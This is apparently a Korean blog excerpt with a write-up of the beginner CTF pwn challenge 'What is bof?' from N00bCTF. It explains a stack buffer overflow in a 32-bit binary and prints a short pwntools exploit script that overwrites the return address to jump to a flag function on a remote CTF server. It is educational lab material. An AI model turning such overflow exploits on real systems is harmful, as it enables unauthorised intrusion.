1) What is bof? (100) BOF가 뭔지 물어보는 기본적인 문제이다.
우선 32bit 리눅스 실행 파일이 주어진다. 메모리 보호기법에는 NX 활성화, Partial Relro 외에 특별한 기법은 없다.
(기본 문제라 그런가 보다.) 쉘 코드를 사용할 수 없으므로 바이너리 내에 호출할 수 있는 함수가 있을 것이다.
(실제로 존재, flag = 0x08048516) Buffer(20) + SFP(4) + RET(0x08048516) 페이로드가 완성 되었다. // pwn1.py from pwn import * p = remote("52.79.224.215", 30005) p.recvuntil(">> ") payload = "\x90"*24 payload += p32(0x08048516) p.sendline(payload) p.interactive()...
![[Pwn] N00bCTF Pwn What is bof?](https://mblogthumb-phinf.pstatic.net/MjAyMDA2MTJfNjgg/MDAxNTkxOTM4NzE2MzE5.69ZWGM64nIzDFlEt1B3C4oZDrrydoAb2szR3gf04t-0g.RtjFR78vS59tCmkIbLjvmcXOFBldm0o31Vz4N-AhLVog.PNG.ldw0811/image.png?type=w2)
#
bof
#
워게임
#
wargame
#
pwnable
#
pwn
#
overflow
#
n00bctf
#
ctf
#
buffer
#
포너블
원문 링크 : [Pwn] N00bCTF Pwn What is bof?
![[백준/BOJ] 10171번 고양이](https://mblogthumb-phinf.pstatic.net/MjAxOTA4MTZfMTMz/MDAxNTY1ODg3NjUzNTQz.vXnjcFO1UUULm_QLr14vHZfSu0FLsubJ_jlgKvX2LzIg.e2e-mpeCkhry6d8T94QsS32cPFnQJ9LhkvB_UHlVOvAg.PNG.ldw0811/image.png?type=w2)
![[Network] VMware의 NAT 구조와 포트포워딩 (1)](https://mblogthumb-phinf.pstatic.net/MjAxOTA5MDRfNDEg/MDAxNTY3NTIyOTA2MTky.YJfg_NiT66VIRygysmqI-NL_5Kgrc2tF1Dk9e_bGE6Ig.EQ6hjwrdDbGTnS1NaFYAZ19_kRi8kwc_OyBbzSqWXqAg.PNG.ldw0811/image.png?type=w2)
![[Web] HackCTF Hidden 풀이](https://mblogthumb-phinf.pstatic.net/MjAxOTEyMDRfNDkg/MDAxNTc1Mzg5NTMxMjgy.ihm2KW8lkid7R2erLNSvyuou4wEvq7i2GPsWcNJHEQ8g.8Bjr52MLj452_BkYr-qSQA776vOyV57NXtUOzGhqepEg.PNG.ldw0811/image.png?type=w2)
![[Forensic] SuNiNaTaS 18번 풀이](https://mblogthumb-phinf.pstatic.net/MjAxOTEyMTBfNjEg/MDAxNTc1OTA1ODc3ODk0.NXeNSot8XJNwuGReBm6nVf3OxX5DjblcQe7hnGWHuQog.SjxKm9koW7ECFF44pX7C5_UKSfsGJKqA7HQrSnDAwXog.PNG.ldw0811/image.png?type=w2)
![[Forensic] SuNiNaTaS 16번 풀이](https://mblogthumb-phinf.pstatic.net/MjAxOTEyMTBfODUg/MDAxNTc1OTQ4ODQzMzgy.Fp8BGPlqRtTrNIAQcYZ_g3PdGAvyAiMF2FV0-9q-iOEg.8ec_na2iJ7ZTrNjWMP4aZggNJ5R2bzbC-nQ5doG6tg4g.PNG.ldw0811/image.png?type=w2)
![[백준/BOJ] 10798번 세로 읽기](https://mblogthumb-phinf.pstatic.net/MjAyMDAxMjJfMjAg/MDAxNTc5NjE5NDg3MTEy.O-KzIc_hKbbgetYgyD07enemSZEgW_KfVx9PFCeZbPMg.MWm21vn1uyiPskKPF7dprmLLf0GJKQz9CmIEEiEE-PMg.PNG.ldw0811/image.png?type=w2)